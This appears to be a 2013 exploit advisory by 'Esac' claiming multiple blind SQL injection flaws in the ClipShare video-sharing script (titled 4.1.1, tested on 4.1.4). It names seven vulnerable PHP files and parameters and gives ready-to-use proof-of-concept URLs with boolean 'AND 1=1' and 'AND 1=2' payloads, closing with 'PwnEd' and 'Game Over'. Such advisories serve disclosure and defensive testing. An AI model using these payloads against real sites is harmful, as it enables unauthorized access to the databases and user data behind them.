# Exploit Title: ClipShare 4.1.1 - Multiples Vulnerabilites
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Last Checked: 27 March 2013
# Note : to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)
==============================================================================================
vuln file : gvideos.php , param : gid
Poc :
http://server/mavideo/gvideos.php?gid=1 [Blind]
#to exlploit this poc , must group to be added previously with some videos publics
Real exploitation :
http://server/mavideo/gvideos.php?gid=1 AND 1=1
==> return normal page
http://server/mavideo/gvideos.php?gid=1 AND 1=2
==> return page with some errors ( or with nothing - white page )
-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : channel_detail.php , param : chid
Poc :
http://server/mavideo/channel_detail.php?chid=4 [Blind]
Real exploitation :
http://server/mavideo/channel_detail.php?chid=4 AND 1=1
==> return normal page
http://server/mavideo/channel_detail.php?chid=4 AND 1=2
==> return page with some errors ( or with nothing - white page )
-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : uprofile.php , param : UID
Poc :
http://server/mavideo/uprofile.php?UID=66 [Blind]
Real exploitation :
http://server/mavideo/uprofile.php?UID=66 AND 1=1
==> return normal page
http://server/mavideo/uprofile.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )
-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : ufavour.php , param : UID
Poc :
http://server/mavideo/ufavour.php?UID=66 [Blind]
Real exploitation :
http://server/mavideo/ufavour.php?UID=66 AND 1=1
==> return normal page
http://server/mavideo/ufavour.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )
-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : ufriends.php , param : UID
Poc :
http://server/mavideo/ufriends.php?UID=66 [Blind]
Real exploitation :
http://server/mavideo/ufriends.php?UID=66 AND 1=1
==> return normal page
http://server/mavideo/ufriends.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )
-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : uplaylist.php , param : UID
Poc :
http://server/mavideo/uplaylist.php?UID=66 [Blind]
Real exploitation :
http://server/mavideo/uplaylist.php?UID=66 AND 1=1
==> return normal page
http://server/mavideo/uplaylist.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )
-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : ugroups.php , param : UID
Poc :
http://server/mavideo/ugroups.php?UID=66 [Blind]
Real exploitation :
http://server/mavideo/ugroups.php?UID=66 AND 1=1
==> return normal page
http://server/mavideo/ugroups.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )
-------------------------------------------------------------------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 27, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.
~ Game Over ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz : White Tarbouch Team & Cobra & Dami
==> Made In Moroco <==
./Esac
